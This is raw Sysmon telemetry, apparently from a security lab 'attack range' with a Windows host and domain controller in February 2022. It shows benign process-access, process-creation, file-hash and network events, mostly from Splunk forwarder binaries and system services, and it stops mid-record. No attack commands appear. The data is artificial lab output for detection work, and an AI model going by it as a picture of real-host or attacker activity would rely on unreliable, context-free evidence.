10341000x8000000000000000214905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F2F-6216-1304-000000003902}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0F2F-6216-1304-000000003902}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.461{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F2F-6216-1304-000000003902}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.462{4F8D34B0-0F2F-6216-1304-000000003902}1240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:48.868{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=550FA2371948E23699F90E6857C80097,SHA256=2C3743227F06570F2BB66DE86A2E8725961ECB0B291702260A46F1E51CD28724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:48.344{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C03F30BE37534A245AD3BEA943171807,SHA256=C22A072120F3294F5721AC8A777AE2182BA9104287A990EB9C768392DC1C3B2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:46.634{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51222-false10.0.1.12-8000- 23542300x8000000000000000214922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:48.571{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED80BABF7349630E22B960E0D8B86F69,SHA256=B0C69DFFC91C5BADE442EA2F1770804291E163B82657E8D5F5EF3546403B0939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:48.328{C8EA50B7-F2AD-6215-BB00-000000003802}4488ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\UFGN8YJ3\views[1]MD5=BEE1758A485085BB8A121EB74BA7E96F,SHA256=EDCAD5B1CE8A304B70B8C9EA57D4AEAB740D979FFA59243B943011CB1BA4D57E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:48.328{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\YKXF6S3A\views[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:48.250{C8EA50B7-F2AD-6215-BB00-000000003802}4488ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\YKXF6S3A\views[1]MD5=A726593A8261930E4786375106FC6BFE,SHA256=E6BFDFBB9A0649EA9D38DE4255C355C581097E6A1035A54943260B22AD45F172,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:48.250{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\F8NJDPEL\views[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:48.234{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\UFGN8YJ3\views[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:49.359{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13E0601EB51C7B4FE6244C7D375DEA2C,SHA256=3921DF488890D23E5ACD5908E1F0035BAFF9BE162D3A411CFBF52174D2D26283,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F31-6216-1604-000000003902}1176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:49.836{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 